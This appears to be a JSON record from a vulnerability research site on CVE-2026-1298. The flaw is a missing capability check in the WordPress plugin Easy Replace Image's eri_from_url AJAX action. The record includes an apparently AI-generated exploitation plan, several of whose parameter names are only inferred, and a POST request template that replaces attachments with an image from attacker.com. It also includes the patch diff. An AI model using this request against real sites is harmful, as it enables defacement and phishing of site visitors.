[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUGZyNweTqHIhz5_LOzmi3SKlbSOr_mxCa6HsVxk5BBY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":27,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":32},"CVE-2026-1298","easy-replace-image-missing-authorization-to-authenticated-contributor-arbitrary-attachment-replacement","Easy Replace Image \u003C= 3.5.2 - Missing Authorization to Authenticated (Contributor+) Arbitrary Attachment Replacement","The Easy Replace Image plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.5.2. This is due to missing capability checks on the `image_replacement_from_url` function that is hooked to the `eri_from_url` AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to replace arbitrary image attachments on the site with images from external URLs, potentially enabling site defacement, phishing attacks, or content manipulation.","easy-replace-image",null,"\u003C=3.5.2","3.5.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-27 17:10:48","2026-03-27 11:00:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F27332c13-c25f-47ec-980d-035fc35ce553?source=api-prod",59,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1298 (Easy Replace Image)\n\n## 1. Vulnerability Summary\nThe **Easy Replace Image** plugin for WordPress (versions \u003C= 3.5.2) contains a missing authorization vulnerability in its AJAX handler for image replacement. The function `image_replacement_from_url` is registered to the `eri_from_url` AJAX action. While WordPress requires a user to be authenticated to trigger `wp_ajax_*` hooks, the plugin fails to perform specific capability checks (e.g., `current_user_can('edit_post', $attachment_id)`) within the handler. This allows any authenticated user with at least Contributor-level access to replace the file associated with any existing attachment ID with an image from an arbitrary external URL.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `eri_from_url`\n- **HTTP Method:** `POST`\n- **Parameters (Inferred):**\n    - `action`: `eri_from_url`\n    - `attachment_id` or `id`: The ID of the target image attachment (Inferred).\n    - `url` or `image_url`: The URL of the replacement image (Inferred).\n    - `nonce` or `security`: A WordPress nonce for the action (Inferred).\n- **Authentication:** Authenticated (Contributor level or higher).\n- **Preconditions:** The attacker must know the ID of an existing attachment to replace.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers the AJAX hook during initialization:\n   `add_action('wp_ajax_eri_from_url', 'image_replacement_from_url');`\n2. **Missing Check:** The `image_replacement_from_url` function starts processing. It likely performs a nonce check using `check_ajax_referer` or `wp_verify_nonce`, but it **omits** any check like `current_user_can('upload_files')` or `current_user_can('edit_post', $post_id)`.\n3. **Data Acquisition:** The function retrieves the external `url` and target `attachment_id` from the `$_POST` superglobal.\n4. **Download & Replace:**\n   - It likely uses `download_url()` or `wp_remote_get()` to fetch the external image.\n   - It identifies the local path of the current attachment using `get_attached_file($attachment_id)`.\n   - It overwrites the existing file on the filesystem with the newly downloaded content or updates the `_wp_attached_file` metadata.\n5. **Sink:** The file system write operation or database update that modifies the attachment.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely enqueues its scripts and localizes a nonce on the media library or post edit pages. Since Contributors can access the WordPress dashboard and potentially the Media Library (depending on specific site lockdown), they can extract the nonce.\n\n1. **Shortcode\u002FPage Identification:** The plugin's logic for replacing images is typically found in the Media Library or Attachment edit screens.\n2. **Detection:** Search the plugin source for `wp_localize_script`. Look for a handle like `eri-script` or `easy-replace-image`.\n3. **JS Variable (Inferred):** Look for keys like `eri_ajax_nonce` or `nonce` within the localized object.\n4. **Extraction Plan:**\n   - Log in as a Contributor.\n   - Navigate to the Media Library: `\u002Fwp-admin\u002Fupload.php`.\n   - Use `browser_eval` to find the localized object:\n     `browser_eval(\"window.eri_params?.nonce || window.eri_obj?.security\")` (Inferred identifiers).\n   - If not in the Media Library, check the \"Edit Media\" page for a specific attachment: `\u002Fwp-admin\u002Fpost.php?post=ATTACHMENT_ID&action=edit`.\n\n## 5. Exploitation Strategy\n1. **Setup:** Log in as a Contributor user.\n2. **Identify Target:** Find an image uploaded by an administrator (e.g., Attachment ID 10).\n3. **Obtain Nonce:** Extract the nonce using the strategy in Section 4.\n4. **Execute Attack:** Send a POST request to `admin-ajax.php` to replace the admin's image.\n\n**Request Template:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=eri_from_url&nonce=[NONCE]&attachment_id=10&url=https:\u002F\u002Fattacker.com\u002Fdefacement.png\n```\n*(Note: Parameter names like `attachment_id` and `url` must be verified against the source code once available).*\n\n## 6. Test Data Setup\n1. **Admin Content:** An Admin user uploads an image named `original.jpg`. Note its Attachment ID.\n2. **Attacker Account:** Create a user with the `contributor` role.\n3. **External Source:** Identify a public image URL to use as the replacement (e.g., a simple color block).\n\n## 7. Expected Results\n- The AJAX response should return a success status (e.g., JSON `{\"success\": true}`).\n- When viewing the attachment in the WordPress Media Library, the original image (`original.jpg`) should be replaced by the image from the attacker's URL.\n- The file on the server's disk (e.g., `wp-content\u002Fuploads\u002FYYYY\u002FMM\u002Foriginal.jpg`) will now contain the data from the external URL.\n\n## 8. Verification Steps\n1. **WP-CLI Path Check:**\n   `wp post get [ID] --field=guid` (This shows the URL).\n2. **WP-CLI Meta Check:**\n   `wp post meta get [ID] _wp_attached_file`\n3. **Content Verification:**\n   Download the file at the path returned by `get_attached_file` and compare its hash to the source image from the external URL.\n   ```bash\n   # Get local path\n   FILE_PATH=$(wp eval \"echo get_attached_file([ID]);\")\n   # Check if file content matches attacker's image\n   md5sum $FILE_PATH\n   ```\n\n## 9. Alternative Approaches\n- **Different Parameters:** If `attachment_id` doesn't work, the plugin might use `post_id` or simply `id`.\n- **Direct Metadata Modification:** Check if the plugin allows replacing other metadata if the payload allows for arbitrary parameter injection into `update_post_meta`.\n- **Phishing\u002FXSS:** If the replacement URL is not properly sanitized and later output in the admin panel, this could lead to Stored XSS.","The Easy Replace Image plugin for WordPress is vulnerable to unauthorized attachment replacement in versions up to 3.5.2. This occurs because the AJAX handler responsible for fetching and replacing images from a URL lacks a capability check, allowing users with Contributor-level access or higher to overwrite arbitrary attachments.","--- a\u002Feasy-replace-image.php\n+++ b\u002Feasy-replace-image.php\n@@ -242,6 +242,10 @@\n \t$attachment_id = isset( $_POST['attachment_id'] ) ? intval( $_POST['attachment_id'] ) : 0;\n \t$url           = isset( $_POST['url'] ) ? esc_url_raw( wp_unslash( $_POST['url'] ) ) : '';\n \n+\tif ( ! current_user_can( 'edit_post', $attachment_id ) ) {\n+\t\twp_send_json_error( array( 'message' => __( 'You do not have permission to edit this image.', 'easy-replace-image' ) ) );\n+\t}\n+\n \tif ( empty( $attachment_id ) || empty( $url ) ) {\n \t\twp_send_json_error( array( 'message' => __( 'Invalid request.', 'easy-replace-image' ) ) );\n \t}","To exploit this vulnerability, an attacker must first authenticate with at least Contributor-level permissions. The attacker then identifies a target attachment ID (such as a critical site logo or an administrator's upload). Next, the attacker extracts the necessary security nonce from the WordPress admin dashboard (localized by the plugin for the media library). Finally, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `eri_from_url`, containing the target `attachment_id`, the malicious replacement `url`, and the valid `nonce`. The plugin downloads the external image and overwrites the existing attachment on the server without verifying the user's authority to edit that specific attachment.","gemini-3-flash-preview","2026-05-04 22:46:13","2026-05-04 22:48:01",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.5.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-replace-image\u002Ftags\u002F3.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-replace-image.3.5.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-replace-image\u002Ftags\u002F3.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-replace-image.3.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-replace-image\u002Ftags"]